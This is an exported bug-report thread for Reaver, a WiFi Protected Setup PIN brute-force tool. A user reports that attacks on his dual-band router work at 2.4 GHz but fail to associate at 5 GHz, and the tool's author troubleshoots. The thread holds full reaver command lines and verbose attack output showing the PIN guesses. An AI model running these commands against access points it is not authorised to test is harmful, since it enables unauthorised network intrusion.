gylns / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Works on 802.11n 2 Ghz, not on 801.11n 5 Ghz #146

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)
Reaver 1.4 r97

1. What operating system are you using (Linux is the only supported OS)?

Ubuntu 11.10, kernel 3.0, in kernel iwlagn driver, Intel advanced Centrino 
N-6200 mini pci-e AGN wlan card

2. Is your wireless card in monitor mode (yes/no)?
Yes

3. What is the signal strength of the Access Point you are trying to crack?
-48 / -54 according to data collected by wash. Corresponds with Kismet logged 
signal strength

4. What is the manufacturer and model # of the device you are trying to
crack?
Trendnet TEW-673 GRU (Same as D-link 825 with added LCD display and extra USB 
port)

5. What is the entire command line string you are supplying to reaver?

sudo reaver -i wlan0mon -5 -b 00:14:D1:E6:8F:FA -d 1 -t 1 -vv for the 5 Ghz 
attempt

sudo reaver -i wlan0mon -b 00:14:D1:E6:8F:F8 -d 1 -t 1 -vv for the 2.4 Ghz 
attempt

6. Please describe what you think the issue is.

Reaver works for the 2.4 Ghz attempt, and finds the pin. Reaver fails in 
association for the 5 Ghz attempt. Not sure if it is a driver issue, where 
injection doesn't work on 802.11a band or a reaver related problem

7. Paste the output from Reaver below.

5 Ghz attempt
dutch@ubuntu:~/src/reaver-devel/src$ sudo reaver -i wlan0mon -5 -b 
00:14:D1:E6:8F:FA -d 1 -t 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:14:D1:E6:8F:FA
[+] Switching wlan0mon to channel 36
[!] WARNING: Failed to associate with 00:14:D1:E6:8F:FA (ESSID: rootsdkwlan)
[!] WARNING: Failed to associate with 00:14:D1:E6:8F:FA (ESSID: rootsdkwlan)
^C
[+] Nothing done, nothing to save.

pcap file for 5 Ghz attempt : http://peecee.dk/upload/download/346358

2.4 Ghz attempt
dutch@ubuntu:~/src/reaver-devel/src$ sudo reaver -i wlan0mon -5 -b 
00:14:D1:E6:8F:F8 -d 1 -t 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:14:D1:E6:8F:F8
[+] Switching wlan0mon to channel 34
[+] Switching wlan0mon to channel 36
[+] Switching wlan0mon to channel 38
[+] Switching wlan0mon to channel 40
[+] Switching wlan0mon to channel 1
[+] Associated with 00:14:D1:E6:8F:F8 (ESSID: rootsdkwlan)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00015677
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00025676
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00035675
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00045674
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2012-01-16 23:10:27 (2 seconds/pin)

Pcap for 2.4 ghz  : http://peecee.dk/upload/download/346359

Original issue reported on code.google.com by jdsmob...@gmail.com on 16 Jan 2012 at 10:33

GoogleCodeExporter commented 9 years ago
It looks like injection is working as Reaver is sending out authentication 
packets to the AP. The AP is not responding at all though. I have used Reaver 
against 5GHz APs before, but not with the latest SVN. I'll test this with my N 
adapter tomorrow morning.

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 10:46

GoogleCodeExporter commented 9 years ago
Hmm, thats weird, since I can connect fine on 5Ghz, and roaming between 5Ghz 
and 2.4 Ghz works fine as well.

Original comment by jdsmob...@gmail.com on 16 Jan 2012 at 10:53

GoogleCodeExporter commented 9 years ago
Yeah, 5GHz doesn't have very good range, but it looks like you have an OK 
signal from the AP so I don't think that's the issue. Let me verify that 5GHz 
works for me, I'll report back tomorrow (left my N card at work).

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 11:02

GoogleCodeExporter commented 9 years ago
Tested with the dualband router set to only A band. Same issue. Can associate 
normally and use the connection, but reaver doesn't associate.

Original comment by jdsmob...@gmail.com on 17 Jan 2012 at 11:18

GoogleCodeExporter commented 9 years ago
Bump - Did you get to test it when you got to work ? I am starting to think its 
an AP/Router specific item, but haven't had the chance to test it vs another 
dual band router yet.

Original comment by jdsmob...@gmail.com on 20 Jan 2012 at 7:05

GoogleCodeExporter commented 9 years ago
Bump again, Craig, did you get to test against a 5 Ghz band router ?

Original comment by jdsmob...@gmail.com on 22 Jan 2012 at 7:50

GoogleCodeExporter commented 9 years ago
Sorry for the late reply jds. I'm running reaver against a 5GHz N router right 
now (channel 36) with no problems. I'm using an Ubiquiti SR71 a/b/g/n card with 
ath9k drivers under Ubuntu 10.04.

Original comment by cheff...@tacnetsol.com on 23 Jan 2012 at 12:40